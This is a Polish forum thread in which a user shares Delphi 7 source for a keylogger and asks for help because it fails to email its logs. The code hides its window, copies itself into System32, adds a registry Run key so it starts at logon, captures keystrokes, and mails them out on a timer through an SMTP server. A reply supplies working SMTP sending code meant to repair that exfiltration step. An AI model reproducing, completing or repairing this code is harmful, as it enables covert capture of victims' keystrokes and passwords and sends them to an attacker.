Pokaż wyniki 1 do 5 z 5

Temat: Blad SMTP - Delphi 7

  1. #1
    Zarejestrowany
    Sep 2009
    Postów
    2

    Domyślnie Blad SMTP - Delphi 7

    Witam. Mam problem. Mianowicie, napisalem keyloggera w Delphi no i wszystko pieknie dziala, lecz nie wysyla logow na email. Oto kod:

    Kod php:
    unit key;

    interface

    uses
    WindowsMessagesSysUtilsVariantsClassesGraphicsControlsForms,
    DialogsStdCtrlsKeySpyXPExtCtrlsIdComponentIdTCPConnection,
    IdTCPClientIdMessageClientIdSMTPIdBaseComponentIdMessageRegistry;

    type
    TForm1 = class(TForm)
    * * 
    IdMessage1TIdMessage;
    * * 
    IdSMTP1TIdSMTP;
    * * 
    Timer1TTimer;
    * * 
    KeySpyXP1TKeySpyXP;
    * * 
    Memo1TMemo;
    * * 
    procedure KeySpyXP1Key(SenderTObjectkeyString);
    procedure Rejestr;
    * * 
    procedure FormCreate(SenderTObject);
    * * 
    procedure Timer1Timer(SenderTObject);
    * private
    * * { Private 
    declarations }
    * public
    * * { Public 
    declarations }
    end;

    var
    Form1TForm1;

    implementation

    {$R *.dfm}

    procedure Tform1.Rejestr;
    var
    Rejestr:TRegistry;
    begin
    copyfile(pchar(paramstr(0)),pchar('C:\WINDOWS\System32\keylogger.exe'),true);
    Rejestr:=TRegistry.Create;
    Rejestr.RootKey:=(HKEY_CURRENT_USER);
    Rejestr.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',False);
    Rejestr.WriteString('keylogger''C:\WINDOWS\System32\keylogger.exe');
    Rejestr.Free;
    end;

    procedure TForm1.KeySpyXP1Key(SenderTObjectkeyString);
    begin
    memo1
    .text := memo1.text key;
    memo1.text:=Stringreplace(memo1.Text,'{ENTER}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{RightMouseButton}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{LeftMouseButton}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{DELETE}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{Alt}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{shift}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{ctrl}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{TAB}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{LEFT SHIFT}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{UP}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{DOWN}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{RIGHT}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{LEFT}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F1}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F2}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F3}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F4}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F5}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F6}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F7}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F8}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F9}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F10}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F11}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{F12}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{RIGHT CONTROL}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{LEFT ALT}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{BACKSPACE}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{LEFT CONTROL}','',[rfreplaceall]);
    memo1.text:=Stringreplace(memo1.Text,'{RIGHT ALT}','',[rfreplaceall]);
    end;

    procedure TForm1.FormCreate(SenderTObject);
    begin
    Application
    .showmainform:=false;
    end;

    procedure TForm1.Timer1Timer(SenderTObject);
    begin
    IdMessage1
    .Body.Append(memo1.text);
    IdMessage1.Recipients.EMailAddresses := 'xxxxx';
    IdMessage1.Subject := 'xxxx';
    IdMessage1.From.name := 'xxx';
    IdMessage1.From.Address :='xxxx';
    idSMTP1.Password := 'xxxx';
    idSMTP1.Username := 'xxxx';
    idSMTP1.Host := 'smtp.wp.pl';
    idSMTP1.AuthenticationType:=atLogin;
    IdSMTP1.Connect;
    try
    IdSMTP1.Send(IdMessage1);
    finally
    idmessage1.body.Clear;
    * *
    memo1.lines.Clear;
    end;
    end;


    END
    W miejscach xxxx wiem wszyskto co wpisac itp, wiec nie tam jest problem. Jesli ktos znajdzie blad to prosze o odpowiedz.

  2. #2
    maciek jest offline IT
    Zarejestrowany
    Jul 2006
    Skąd
    Łódź
    Postów
    249

    Domyślnie

    nie wiem jak z smtp.wp.pl, ale z poczta.o2.pl dziala bardzo dobrze:

    Kod:
      with IdMsgSend do
       begin
        Body.Text:='xxxxx';
        From.Text:='[email protected]';
        ReplyTo.EMailAddresses:='[email protected]';
        Recipients.EMailAddresses:='[email protected]';
        Subject:='xxxxxx';
       end;
    
      SMTP1.AuthenticationType:=atLogin;
      SMTP1.Username:='xxxxxxxxx';
      SMTP1.Password:='*******';
      SMTP1.Host:='poczta.o2.pl';
      SMTP1.Port:=25;
      SMTP1.Connect;
      try
       SMTP1.Send(IdMsgSend);
      finally
       SMTP1.Disconnect;
      end;
    Pozdrawiam

  3. #3
    Zarejestrowany
    Sep 2009
    Postów
    2

    Domyślnie

    Gdy wklejam twój kod wyskakuje bardzo dużo błędów bo chyab z przodu nie ma IDmessage~ itd . a na swoim IDsmtp z pcozta o2 i dalej nie wysyła. Może mógłbyś go skompilować ze swoją wersją i ew podać source

  4. #4
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    nie zna jezyka, a keyloggerow zachcialo sie pisac, potem takie sa efekty.
    btw czyzby polska 'scena hakerska' nie dawala rady?




    sorry, nie moglem sie powstrzymac ;DD
    War, war never changes.

  5. #5
    maciek jest offline IT
    Zarejestrowany
    Jul 2006
    Skąd
    Łódź
    Postów
    249

    Domyślnie

    pokaz jakie bledy dokladnie dostajesz
    Pozdrawiam

Podobne wątki

  1. blad w skrypcie, funkcja str_replace()
    By gogulas in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 1
    Autor: 03-22-2008, 20:37
  2. apache+php = blad :(
    By *DK* in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 4
    Autor: 11-19-2007, 15:35
  3. Smtp
    By Michal_sh in forum Hacking
    Odpowiedzi: 5
    Autor: 10-18-2007, 12:54
  4. blad
    By kalipawel in forum Linux
    Odpowiedzi: 4
    Autor: 04-29-2007, 19:18
  5. blad
    By kalipawel in forum C/C++
    Odpowiedzi: 3
    Autor: 04-09-2007, 10:08

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52